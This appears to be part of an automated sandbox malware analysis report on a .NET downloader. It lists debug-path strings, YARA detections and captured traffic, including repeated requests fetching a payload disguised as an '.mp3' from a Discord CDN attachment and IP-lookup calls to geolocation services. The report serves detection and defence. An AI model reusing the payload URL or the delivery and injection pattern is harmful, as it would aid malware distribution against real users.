Source:	Binary string: .pdb" source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: 0C:\Windows\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\MSBuild.pdbE source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb[ source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: MSBuild.PDB source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\amd64\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indoC:\Windows\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Xml.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: pC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2332223739.000001A345430000.00000004.08000000.00040000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298AE8000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A950A000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2332223739.000001A345430000.00000004.08000000.00040000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298AE8000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A950A000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: C:\Windows\MSBuild.pdbpdbild.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Configuration.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\amd64\MSBuild.pdbll source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: symbols\exe\MSBuild.pdb.pdb` source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb! source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\amd64\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER2BA4.tmp.dmp.6.dr

Networking

Yara detected MSILDownloaderGeneric

Source: Yara match

File source: Process Memory Space: Pnihosiyvr.exe PID: 6180, type: MEMORYSTR

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2326053740.000001A32CC01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2853021181.0000020A80001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2769148817.000001D2987F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pnihosiyvr.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sssssssssssssssss.exe PID: 6136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sssssssssssssssss.exe PID: 2608, type: MEMORYSTR

Source: global traffic	HTTP traffic detected: GET /attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=6628a743&is=66163243&hm=e36bea9e5aea3063f473ba3c29865ff160adc592430b1e4958d27899b61679dc& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=6628a743&is=66163243&hm=e36bea9e5aea3063f473ba3c29865ff160adc592430b1e4958d27899b61679dc& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=6628a743&is=66163243&hm=e36bea9e5aea3063f473ba3c29865ff160adc592430b1e4958d27899b61679dc& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.org

Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242
Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233

Source: Joe Sandbox View

ASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49732 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49745 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=6628a743&is=66163243&hm=e36bea9e5aea3063f473ba3c29865ff160adc592430b1e4958d27899b61679dc& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=6628a743&is=66163243&hm=e36bea9e5aea3063f473ba3c29865ff160adc592430b1e4958d27899b61679dc& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=6628a743&is=66163243&hm=e36bea9e5aea3063f473ba3c29865ff160adc592430b1e4958d27899b61679dc& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/156.146.36.197 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: MSBuild.exe, 00000003.00000002.2519177655.000002592BFB3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357B95000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357C03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BA8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357ADC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357B82000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.000001618010A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: MSBuild.exe, 0000000D.00000002.3229739212.00000161801D7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161800FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MSBuild.exe, 00000003.00000002.2519177655.000002592BEA1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.00000183579D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.0000016180001000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3235921937.00000161FBD46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/A
Source: MSBuild.exe, 0000000D.00000002.3235921937.00000161FBD46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/P6
Source: Pnihosiyvr.exe, 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: MSBuild.exe, 0000000C.00000002.3069095152.0000018370213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftS
Source: MSBuild.exe, 0000000C.00000002.3064626577.0000018357B95000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357AFC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357C03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BA8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357B82000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.000001618012D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC01000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2519177655.000002592BEA1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D2987F1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80001000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.00000183579D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.0000016180001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
